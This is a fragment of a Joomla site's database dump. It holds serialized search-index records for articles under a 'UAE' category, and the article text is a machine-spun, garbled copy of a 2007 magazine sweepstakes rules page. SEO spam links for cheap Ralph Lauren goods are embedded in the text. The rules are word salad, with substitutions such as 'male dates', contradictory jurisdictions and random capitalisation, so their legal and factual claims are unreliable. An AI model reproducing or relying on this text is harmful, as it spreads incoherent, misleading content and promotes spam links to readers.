Lauren UK\" href=\"http://www.stevegriffin.co.uk\">Cheap Ralph Lauren UK</a></b> will not improve your oddS of winning.Legal, declare and local lawS, and provincial or territorial protocolS, and iS void wherever diSallowed by law.AreaS and poSSeSSionS), And europe(Excluding citizenS of the province of quebec and all other countrieS, areaS or poSSeSSionS, who are 18 yrS.Old or older or the age of majority in hiS/her State, State, or territory of reSidence for the duration of entry.Canadian occupantS, to triumph in, muSt firSt thoroughly anSwer, unaided, a time limited math Skill teSting queStion adminiStered by mail.Any thoSe who have, within one year replicated by hand Start date of the SweepStakeS, portrayed ServiceS for SponSor, or itS own parentS, SubSidiarieS, affiliateS and SucceSSor companieS or any organizationS regarding fulfilling, uSing, advertiSing or promoting the drawingS or Supplying any prize, and the immediate family and family of Such individualS, are not eligible to enter the conteSt or win the prize. \"Immediate relativeS\"Shall mean mum and dad, Step modern familieS, youthful young, Step little, littermateS, Step brotherS and SiSterS, or partnerS, no matter where they live. \"Family memberS\"Shall mean people who Share the Same reSidence at leaSt Several weekS a year, whether having to do with or not.Robotically altered or reproduced entrieS are not eligible.In order to enter the drawing or receive the prize, you muSt fully comply with the State ruleS, and agree to be bound by theSe official ruleS and the behaviourS of SponSor, whoSe activitieS Shall be binding and final in all reSpectS.In the body of your email add your name, program, confront, number and email addreSS.Properly, enter by making the form, completing aS told, in addition to your name, boSS, offer, cell phone number and email addreSS and mail to: \"Guide to development\"ConteSt, c/o men\'S your well-Being, 733 third ave, 10th hardwood baSe, big apple, nyc 10017.You muSt follow all pointS to enter thiS SweepStakeS.Et, july 2nd, 2007, and all mail in entrieS appearS to be poStmarked no later than july 2, 2007.Max one(1)Entry per particular, per e mail detailS, per day on the promotion period.EntrieS by the Same perSon over the limitS Stated herein will be diSqualified.PluS, entry material/entry cannot contain the image or likeneSS of or reference in any recognizable way(AS an example, by full name, or by any part of a name that iS familiar)Any perSon except the entrant, eSpecially, but not tied to, any depictionS of famouS people, unleSS a Signed give off from Such perSon(S)IS Submitted to SponSor and alSo the entry material/entry.3.Random attracting;OddS of taking:SponSor will randomly pick the winner(S)From among all eligible entries collected on july 12, 2007.Odds of winning depend on the amount of eligible entries received.<br /><br />Winner notice:ProSpect winner will be notiFied bY e mail, uSing tHe Feedback provided on HiS/Her entrY, on or tHat iS related to julY 19tH, 2007.THe winner muSt replY witH all inFo requeSted in tHe notiFication witHin Five(5)DaYS From tHe date tHe notice e mail waS Sent, or anotHer winner maY be decided on.Once tHe poSSible winner HaS replied, SponSor will Send to potential winner bY e mail, at tHe e mail reSidence location on HiS/Her entrY, an AFFidavit oF qualiFicationS, relieve liabilitY, SpotligHt releaSe, unleSS banned bY law, and anY otHer certiFication tHat SponSor requireS(A perSon\'S\"AFFidavit\").AS well aS to redeem HiS/Her prize, capabilitY winner(S)Will Sign, are bleSSed witH notarized, and get back to SponSor tHe aFFidavit witHin Fourteen(14)DaYS tHe actual date SponSor Sent tHe aFFidavit.AnY client(HiS/Her parent/legal guardian iF a reSident oF a legiSlation tHat deemS Him/Her to be a minor)Would Sign, Have notarized and get back on SponSor a liabilitY releaSe, Subjection releaSe, unleSS reStricted bY law, and anY otHer FormS tHat SponSor requireS witHin Fourteen(14)DaYS aFter receipt bY HazardS winner(S).SHould: (A new)ProSpectS winner(S)Cannot be reacHed For reasons unknown aFter a reasonable eFFort Has been exerted based on tHe inFormation stated in tHe entrY,(H)OF noncompliance with the above or within anY oF the aForesaid cYcles,(F)Potential winner is found to be ineligible to enter the contests or receive the prize,(Debbie)Potential winner cannot or does not complY with the state rules,(At thelizabeth)Potential winner prize notification or affidavit is returned as undeliverable for reasons unknown, or perhaps a(Y)Potential winner fails to fulfill the affidavit related repayments, the winner shall be disqualified from the sweepstakes and an alternate potential winner may be selected, at sponsor\'s sole prudence, from among additional eligible entries received.Winner selection is under the managing of sponsor, whose preferences are final and binding in all respects.If entrant\'s e mail url, cell phone number, or home mailing address changes after he/she enters the contests, it is the entrant\'s sole dependability to notify sponsor by postal mailing notice to the address stated below to be received before the end of the promotion period.Awards:The rough retail value(Their\"Arv\")Of the prize is $1000 and comprises of two(2)$500 American Express gift cards we have a total of one(1)Prize to be given to one(1)Victorious. American ExpreSS GiFt CardSSHould be conSidered anYwHere tHeY are accepted.Rodale shall have no responsibilities for the replacement of any lost or stolen american express gift cards once the gift cards have been provided to the winner, nor is it responsible for any resulting fees linked to the american express gift cards and their use.Prize is subject to any and all terms that may apply to the american express gift cards.American express is a registered trademark of yankee express company.American express company is not a sponsor of the contest, and endorse this sweepstakes promotion and is not affiliated, any way, with the special promoting and advertising.All other expenses not specifically listed herein are solely the winner\'s accountability including, but not limited by, sales place a burden on, and all inadvertent expenses.Prize subject to any and all applicable terms.Any depictions of prizes are for illustrative usages only.All country wide, state and local taxes on the prize are the sole duty of the winner.Winner will be sent an irs federal 1099 misc tax form for the retail valuation on any prize at or above $600.No download, tax refund, alternative, or replacing of prizes permitted, with the exception that sponsor reserves the right, in its sole foresight, to replace a prize of equal or greater value(Or cash counterpart).Euro.All prizes will be awarded within 1 year of receipt of valid and executed winners affidavit or prize evidence.Any portion of the prize not accepted or unclaimed and/or unused by the winner will be forfeited and won\'t be substituted.<br /><br />6.MarKetinG releaSe;USe of inforMation:Except where prohibiteD or confineD by law, winner acceptance of prize coMpriSeS the winner aGreeMent anD conSent for SponSor to uSe anD/or publiSh winner full naMe, State of reSiDence, entry anD entry cheMicalS, photoS or other liKeneSSeS, photoGraphS, pictureS, expreSS, reportS, bioGraphical factS(Entirely or in part), AnD/or StateMentS MaDe by winner about the SweepStaKeS or SponSor, WorlDWiDe anD in perpetuity for every purpoSeS, Contain, But not liMiteD by, AD, TraDe anD/or proMotion on the part of SponSor, In alMoSt any forMS of MeDia, Now Known or hereafter MaDe, IncorporatinG, But not reStricteD to, IMpreSS, TeleviSion for coMputer, R / c, Cable connection, Electronic or worlD-WiDe-Web, without further StopS, ban, reparation, uncover, teStiMony, or criteria.SiMply by enterinG, entrantS aGree anD conSent to allow SponSor to uSe anD/or publiSh hiS/her perSon\'S naMe, State of reSiDence, entry anD entrieS aSSetS, iMaGeS or other liKeneSSeS, StD, pictureS, SpeaK, cuStoMer reviewS, anD bioGraphical Data(Entirely or in part), WorlDwiDe anD in perpetuity for any purpoSeS, Such aS, But not on a, CaMpaiGnS, TraDe anD/or proMotion for SponSor, In alMoSt any forMS of MeDia, Now Known or hereafter createD, To incluDe, But not reStricteD to, Pattern, Tv Set, AirwaveS, Cable, Electronic or the net, Without further iSSue, Ban, Pay planS, TaKe note of, MeaSure, Or approval to the extent MaDe way for by law.AlSo by enterinG the conteSt, entrantS will be SharinG their info with SponSor.InforMation collecteD by SponSor will be uSeD for aDMiniStration of the SweepStaKeS anD awarDinG the prize.PleaSe refer to SponSor privacy policy for you you inforMation reGarDinG the collection, uSe anD DiScloSure of inforMation by SponSor.SponSor iS not reGarDinG DiScloSureS MaDe by any thirD party.SponSor uSeS reaSonable coMMercial effortS to coMply with feDeral can law anD entrantS May SubSequently opt out of receivinG further eMailS by followinG opt out inStructionS containeD in SponSor policy.All entrieS becoMe the houSe of SponSor upon receipt anD will not be acKnowleDGeD or returneD.ReGulationS, liMitationS, anD/or court perforMS.EntrantS inforMation will not be proviDeD to any thirD partieS, other than aS proviDeD for in the official ruleS or prior to SpoSnor privacy policy. )Merely taMperinG;In orDer to cancel, tranSforM:SponSor anD itS parent proDucerS, SubSiDiarieS, aSSociateS, allieS, SpecialiStS, broKerS, SucceSSorS, aSSiGnS, SaleS aGentS, officerS anD DirectorS Shall not have any obliGation or reSponSibilitieS, incluDinG any liability to awarD any prize to entrantS, with reSpect to: (One)EntrieS/entry MaterialS that contain any MiStaKeS or Do not coMply with or violate the official ruleS; (Y SiMply)EntrieS/entry referenceS, prize claiMS or announceMentS that are loSt, later part of the, not whole, illeGible, unintelliGible, DaMaGeD or perhapS not receiveD by the intenDeD recipient, entirely or in part, Due to private, huMan or technical error reGarDleSS of the Sort; (G)EntrantS who have coMMitteD frauD or Deception in entering or engaging in the SweepStaKeS or claiMing the prize; (M)Phonephone, electronic Digital, coMputer electronicS, a Software prograM, Do networKing, internet or coMputer DoeS not worK properly, failureS or DileMMaS; (Agouritorito)Any inability of the winner to accept the prize unconDitionally; (M)If a prize cannot be awarDeD Due to travel termination, DelayS or DiSruptionS Due to actS of goD, earthquaKeS, terroriSm, weather or other Similar event beyonD SponSor reaSonable control;AnD alSo(You have he)Any DeStruction, injurieS or loSSeS of any KinD cauSeD by any prize or cauSeD by awarDing, acKnowleDgement, thing, help, incorrect uSe, loSS or miSDirection of any prize or reSulting from utilizing thiS promotion or any promotion or prize relateD activitieS.SponSor reServeS an appropriate, in itS Sole acumen, to DiSqualify Someone it finDS to be(An actual)Tampering with the entry proceSS or the operation of the conteSt, or with any web SiteS promoting the DrawingS; (D)Acting in violation of the State ruleS;In addition(K)Entering or attempting to enter the SweepStakeS multiple timeS uSing multiple e mail addreSSeS or the uSe of any robotic or automated deviceS to Submit entrieS.If SponSor findS, in itS Sole prudence, that technical rigorS or unforeSeen eventS compromiSe the integrity or viability of the SweepStakeS, SponSor reServeS the authority to void the entrieS at iSSue, and/or terminate the appropriate portion of the SweepStakeS promotion, Since entire SweepStakeS promotion, and/or modify the drawingS and/or Select winner(S)To award the reward(S)Using all eligible entries received as of the end of contract date.Discharge of liability;Please note of warranty;Forum alternative clause:By engaging in the sweepstakes, entrants and winner agree to liberate and hold harmless sponsor and its parent companies, subsidiaries, affiliate web sites, loved ones, reps, solutions, successors, assigns, persons, officers and company owners, from any liability, for lowering, injure, dings, shock, cost or expense the least bit including without limitation, home and real estate assets damage, compensation claims(Adding emotional distress), And/or death which may occur related to preparation for, Or guidance in, The contests, Or person, Acceptance and/or use or misuse of the prize or engagement in any Sweepstakes related activity and for any claims or causes of action based on publicity rights, Defamation or invasion of privacy and supplement delivery.By acknowledging the prize, winner agrees that any liability concerning or arising out of the prize rests solely with the software creator of the goods or their affiliates.Sponsor and its parent solutions, subsidiaries, web marketers, male dates, employees, broker employees, successors, assigns, workforce, officers and directors assume no task for any injury or damage to entrants or to any other person computer, regardless how caused, relating to or resulting from entering or downloading materials or software in association with this sweepstakes.Entrants and winners acknowledge that sponsor has neither made nor are in any manner answerable or liable for any warranty, representations or makes sure, express or intended, truly or in law, in accordance with any prize, integrating, but not on a, express warranties provided by the maker of the goods or their affiliates.Except where disallowed, all issues and questions concerning the development, abilities, presentation and enforceability of these official rules, or the rights and obligations of entrant or sponsor regarding the the sweepstakes, will likely to be governed by, and construed according to, the laws of the commonwealth of missouri without giving effect to any choice of law or conflict of law rules(Whether of the commonwealth of missouri, or other jurisdiction), Which would cause use of the laws of any jurisdiction other than the Commonwealth of Pennsylvania.As an affiliate, any dispute relating to the drawings(To include these official rules)Shall be brought in the best quality state or federal court having jurisdiction over the subject matter located in the county of lehigh, pa.Entrants hereby irrevocably consent to the non-Public jurisdiction of said courts and waive any claim of forum non conveniens or lack of personal jurisdiction they may have.9.Daily affixed, so that you can:2007 Guide to Style contest, Rodale corporation, 733 3rd Ave, 10th bottom, Nyc, Los angeles 10017 3204.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-26 02:30:53\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"7\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:8:\"132:adcb\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:25:\"index.php/84-uae/132-adcb\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=132\";s:5:\"route\";s:77:\"index.php?option=com_content&view=article&id=132:adcb&catid=84:uae&Itemid=435\";s:5:\"title\";s:4:\"ADCB\";s:11:\"description\";s:14547:\"2007 Guide To stevegriffin Style contest PurchaSe or payment of any kind iS to be able to enter or win.Void where reStricted.A purchaSe or payment Cheap Ralph Lauren UK will not improve your oddS of winning.Legal, declare and local lawS, and provincial or territorial protocolS, and iS void wherever diSallowed by law.AreaS and poSSeSSionS), And europe(Excluding citizenS of the province of quebec and all other countrieS, areaS or poSSeSSionS, who are 18 yrS.Old or older or the age of majority in hiS/her State, State, or territory of reSidence for the duration of entry.Canadian occupantS, to triumph in, muSt firSt thoroughly anSwer, unaided, a time limited math Skill teSting queStion adminiStered by mail.Any thoSe who have, within one year replicated by hand Start date of the SweepStakeS, portrayed ServiceS for SponSor, or itS own parentS, SubSidiarieS, affiliateS and SucceSSor companieS or any organizationS regarding fulfilling, uSing, advertiSing or promoting the drawingS or Supplying any prize, and the immediate family and family of Such individualS, are not eligible to enter the conteSt or win the prize. \"Immediate relativeS\"Shall mean mum and dad, Step modern familieS, youthful young, Step little, littermateS, Step brotherS and SiSterS, or partnerS, no matter where they live. \"Family memberS\"Shall mean people who Share the Same reSidence at leaSt Several weekS a year, whether having to do with or not.Robotically altered or reproduced entrieS are not eligible.In order to enter the drawing or receive the prize, you muSt fully comply with the State ruleS, and agree to be bound by theSe official ruleS and the behaviourS of SponSor, whoSe activitieS Shall be binding and final in all reSpectS.In the body of your email add your name, program, confront, number and email addreSS.Properly, enter by making the form, completing aS told, in addition to yourname, boSS, offer, cell phone number and email addreSS and mail to: \"Guide to development\"ConteSt, c/o men\'S your well-Being, 733 third ave, 10th hardwood baSe, big apple, nyc 10017.You muSt follow all pointS to enter thiS SweepStakeS.Et, july 2nd, 2007, and all mail in entrieS appearS to be poStmarked no later than july 2, 2007.Max one(1)Entry per particular, per e mail detailS, per day on the promotion period.EntrieS by the Same perSon over the limitS Stated herein will be diSqualified.PluS, entry material/entry cannot contain the image or likeneSS of or reference in any recognizable way(AS an example, by full name, or by any part of a name that iS familiar)Any perSon except the entrant, eSpecially, but not tied to, any depictionS of famouS people, unleSS a Signed give off from Such perSon(S)IS Submitted to SponSor and alSo the entry material/entry.3.Random attracting;OddS of taking:SponSor will randomly pick the winner(S)From among all eligible entries collected on july 12, 2007.Odds of winning depend on the amount of eligible entries received. Winner notice:ProSpect winner will be notiFied bY e mail, uSing tHe Feedback provided on HiS/Her entrY, on or tHat iS related to julY 19tH, 2007.THe winner muSt replY witH all inFo requeSted in tHe notiFication witHin Five(5)DaYS From tHe date tHe notice e mail waS Sent, or anotHer winner maY be decided on.Once tHe poSSible winner HaS replied, SponSor will Send to potential winner bY e mail, at tHe e mail reSidence location on HiS/Her entrY, an AFFidavit oF qualiFicationS, relieve liabilitY, SpotligHt releaSe, unleSS banned bY law, and anY otHer certiFication tHat SponSor requireS(A perSon\'S\"AFFidavit\").AS well aS to redeem HiS/Her prize, capabilitY winner(S)Will Sign, are bleSSed witH notarized, and get back to SponSor tHe aFFidavit witHin Fourteen(14)DaYS tHe actual date SponSor Sent tHe aFFidavit.AnY client(HiS/Her parent/legal guardian iF a reSident oF a legiSlation tHat deemS Him/Her to be a minor)Would Sign, Have notarized and get back on SponSor aliabilitY releaSe, Subjection releaSe, unleSS reStricted bY law, and anY otHer FormS tHat SponSor requireS witHin Fourteen(14)DaYS aFter receipt bY HazardS winner(S).SHould: (A new)ProSpectS winner(S)Cannot be reacHed For reasons unknown aFter a reasonable eFFort Has been exerted based on tHe inFormation stated in tHe entrY,(H)OF noncompliance with the above or within anY oF the aForesaid cYcles,(F)Potential winner is found to be ineligible to enter the contests or receive the prize,(Debbie)Potential winner cannot or does not complY with the state rules,(At thelizabeth)Potential winner prize notification or affidavit is returned as undeliverable for reasons unknown, or perhaps a(Y)Potential winner fails to fulfill the affidavit related repayments, the winner shall be disqualified from the sweepstakes and an alternate potential winner may be selected, at sponsor\'s sole prudence, from among additional eligible entries received.Winner selection is under the managing of sponsor, whose preferences are final and binding in all respects.If entrant\'s e mail url, cell phone number, or home mailing address changes after he/she enters the contests, it is the entrant\'s sole dependability to notify sponsor by postal mailing notice to the address stated below to be received before the end of the promotion period.Awards:The rough retail value(Their\"Arv\")Of the prize is $1000 and comprises of two(2)$500 American Express gift cards we have a total of one(1)Prize to be given to one(1)Victorious. American ExpreSS GiFt CardSSHould be conSidered anYwHere tHeY are accepted.Rodale shall have no responsibilities for the replacement of any lost or stolen american express gift cards once the gift cards have been provided to the winner, nor is it responsible for any resulting fees linked to the american express gift cards and their use.Prize is subject to any and all terms that may apply to the american express gift cards.American express is a registered trademark of yankee express company.American express company is not a sponsor of thecontest, and endorse this sweepstakes promotion and is not affiliated, any way, with the special promoting and advertising.All other expenses not specifically listed herein are solely the winner\'s accountability including, but not limited by, sales place a burden on, and all inadvertent expenses.Prize subject to any and all applicable terms.Any depictions of prizes are for illustrative usages only.All country wide, state and local taxes on the prize are the sole duty of the winner.Winner will be sent an irs federal 1099 misc tax form for the retail valuation on any prize at or above $600.No download, tax refund, alternative, or replacing of prizes permitted, with the exception that sponsor reserves the right, in its sole foresight, to replace a prize of equal or greater value(Or cash counterpart).Euro.All prizes will be awarded within 1 year of receipt of valid and executed winners affidavit or prize evidence.Any portion of the prize not accepted or unclaimed and/or unused by the winner will be forfeited and won\'t be substituted. 6.MarKetinG releaSe;USe of inforMation:Except where prohibiteD or confineD by law, winner acceptance of prize coMpriSeS the winner aGreeMent anD conSent for SponSor to uSe anD/or publiSh winner full naMe, State of reSiDence, entry anD entry cheMicalS, photoS or other liKeneSSeS, photoGraphS, pictureS, expreSS, reportS, bioGraphical factS(Entirely or in part), AnD/or StateMentS MaDe by winner about the SweepStaKeS or SponSor, WorlDWiDe anD in perpetuity for every purpoSeS, Contain, But not liMiteD by, AD, TraDe anD/or proMotion on the part of SponSor, In alMoSt any forMS of MeDia, Now Known or hereafter MaDe, IncorporatinG, But not reStricteD to, IMpreSS, TeleviSion for coMputer, R / c, Cable connection, Electronic or worlD-WiDe-Web, without further StopS, ban, reparation, uncover, teStiMony, or criteria.SiMply by enterinG, entrantS aGree anD conSent to allow SponSor to uSe anD/or publiSh hiS/her perSon\'S naMe, State of reSiDence, entry anD entrieS aSSetS, iMaGeS or otherliKeneSSeS, StD, pictureS, SpeaK, cuStoMer reviewS, anD bioGraphical Data(Entirely or in part), WorlDwiDe anD in perpetuity for any purpoSeS, Such aS, But not on a, CaMpaiGnS, TraDe anD/or proMotion for SponSor, In alMoSt any forMS of MeDia, Now Known or hereafter createD, To incluDe, But not reStricteD to, Pattern, Tv Set, AirwaveS, Cable, Electronic or the net, Without further iSSue, Ban, Pay planS, TaKe note of, MeaSure, Or approval to the extent MaDe way for by law.AlSo by enterinG the conteSt, entrantS will be SharinG their info with SponSor.InforMation collecteD by SponSor will be uSeD for aDMiniStration of the SweepStaKeS anD awarDinG the prize.PleaSe refer to SponSor privacy policy for you you inforMation reGarDinG the collection, uSe anD DiScloSure of inforMation by SponSor.SponSor iS not reGarDinG DiScloSureS MaDe by any thirD party.SponSor uSeS reaSonable coMMercial effortS to coMply with feDeral can law anD entrantS May SubSequently opt out of receivinG further eMailS by followinG opt out inStructionS containeD in SponSor policy.All entrieS becoMe the houSe of SponSor upon receipt anD will not be acKnowleDGeD or returneD.ReGulationS, liMitationS, anD/or court perforMS.EntrantS inforMation will not be proviDeD to any thirD partieS, other than aS proviDeD for in the official ruleS or prior to SpoSnor privacy policy. )Merely taMperinG;In orDer to cancel, tranSforM:SponSor anD itS parent proDucerS, SubSiDiarieS, aSSociateS, allieS, SpecialiStS, broKerS, SucceSSorS, aSSiGnS, SaleS aGentS, officerS anD DirectorS Shall not have any obliGation or reSponSibilitieS, incluDinG any liability to awarD any prize to entrantS, with reSpect to: (One)EntrieS/entry MaterialS that contain any MiStaKeS or Do not coMply with or violate the official ruleS; (Y SiMply)EntrieS/entry referenceS, prize claiMS or announceMentS that are loSt, later part of the, not whole, illeGible, unintelliGible, DaMaGeD or perhapS not receiveD by the intenDeD recipient, entirely or in part, Due to private, huMan or technical error reGarDleSSof the Sort; (G)EntrantS who have coMMitteD frauD or Deception in entering or engaging in the SweepStaKeS or claiMing the prize; (M)Phonephone, electronic Digital, coMputer electronicS, a Software prograM, Do networKing, internet or coMputer DoeS not worK properly, failureS or DileMMaS; (Agouritorito)Any inability of the winner to accept the prize unconDitionally; (M)If a prize cannot be awarDeD Due to travel termination, DelayS or DiSruptionS Due to actS of goD, earthquaKeS, terroriSm, weather or other Similar event beyonD SponSor reaSonable control;AnD alSo(You have he)Any DeStruction, injurieS or loSSeS of any KinD cauSeD by any prize or cauSeD by awarDing, acKnowleDgement, thing, help, incorrect uSe, loSS or miSDirection of any prize or reSulting from utilizing thiS promotion or any promotion or prize relateD activitieS.SponSor reServeS an appropriate, in itS Sole acumen, to DiSqualify Someone it finDS to be(An actual)Tampering with the entry proceSS or the operation of the conteSt, or with any web SiteS promoting the DrawingS; (D)Acting in violation of the State ruleS;In addition(K)Entering or attempting to enter the SweepStakeS multiple timeS uSing multiple e mail addreSSeS or the uSe of any robotic or automated deviceS to Submit entrieS.If SponSor findS, in itS Sole prudence, that technical rigorS or unforeSeen eventS compromiSe the integrity or viability of the SweepStakeS, SponSor reServeS the authority to void the entrieS at iSSue, and/or terminate the appropriate portion of the SweepStakeS promotion, Since entire SweepStakeS promotion, and/or modify the drawingS and/or Select winner(S)To award the reward(S)Using all eligible entries received as of the end of contract date.Discharge of liability;Please note of warranty;Forum alternative clause:By engaging in the sweepstakes, entrants and winner agree to liberate and hold harmless sponsor and its parent companies, subsidiaries, affiliate web sites, loved ones, reps, solutions, successors, assigns, persons, officers and company owners, from anyliability, for lowering, injure, dings, shock, cost or expense the least bit including without limitation, home and real estate assets damage, compensation claims(Adding emotional distress), And/or death which may occur related to preparation for, Or guidance in, The contests, Or person, Acceptance and/or use or misuse of the prize or engagement in any Sweepstakes related activity and for any claims or causes of action based on publicity rights, Defamation or invasion of privacy and supplement delivery.By acknowledging the prize, winner agrees that any liability concerning or arising out of the prize rests solely with the software creator of the goods or their affiliates.Sponsor and its parent solutions, subsidiaries, web marketers, male dates, employees, broker employees, successors, assigns, workforce, officers and directors assume no task for any injury or damage to entrants or to any other person computer, regardless how caused, relating to or resulting from entering or downloading materials or software in association with this sweepstakes.Entrants and winners acknowledge that sponsor has neither made nor are in any manner answerable or liable for any warranty, representations or makes sure, express or intended, truly or in law, in accordance with any prize, integrating, but not on a, express warranties provided by the maker of the goods or their affiliates.Except where disallowed, all issues and questions concerning the development, abilities, presentation and enforceability of these official rules, or the rights and obligations of entrant or sponsor regarding the the sweepstakes, will likely to be governed by, and construed according to, the laws of the commonwealth of missouri without giving effect to any choice of law or conflict of law rules(Whether of the commonwealth of missouri, or other jurisdiction), Which would cause use of the laws of any jurisdiction other than the Commonwealth of Pennsylvania.As an affiliate, any dispute relating to the drawings(To include these official rules)Shall be broughtin the best quality state or federal court having jurisdiction over the subject matter located in the county of lehigh, pa.Entrants hereby irrevocably consent to the non-Public jurisdiction of said courts and waive any claim of forum non conveniens or lack of personal jurisdiction they may have.9.Daily affixed, so that you can:2007 Guide to Style contest, Rodale corporation, 733 3rd Ave, 10th bottom, Nyc, Los angeles 10017 3204.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(111,'index.php?option=com_content&view=article&id=128','index.php?option=com_content&view=article&id=128:business-pages-2&catid=84:uae&Itemid=435','sico','Pertaining to each Ralph Lauren Italia luxottica obiettivo 5 miliardi As a result of anni fa erano 4, 3 miliardi, l\' anno scorso quasi 4, 7 i quatst\' anno?Supererà, quest\' anno, luxottica, los angeles barriera dei 5 miliardi di fatturato?Il 65% delete gir','2015-05-27 01:11:46','fd1724f3d1dc2edea5b5c18bace8e819',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"128\";s:5:\"alias\";s:16:\"business-pages-2\";s:7:\"summary\";s:7193:\"<p>Pertaining to each <b><a title=\"Ralph 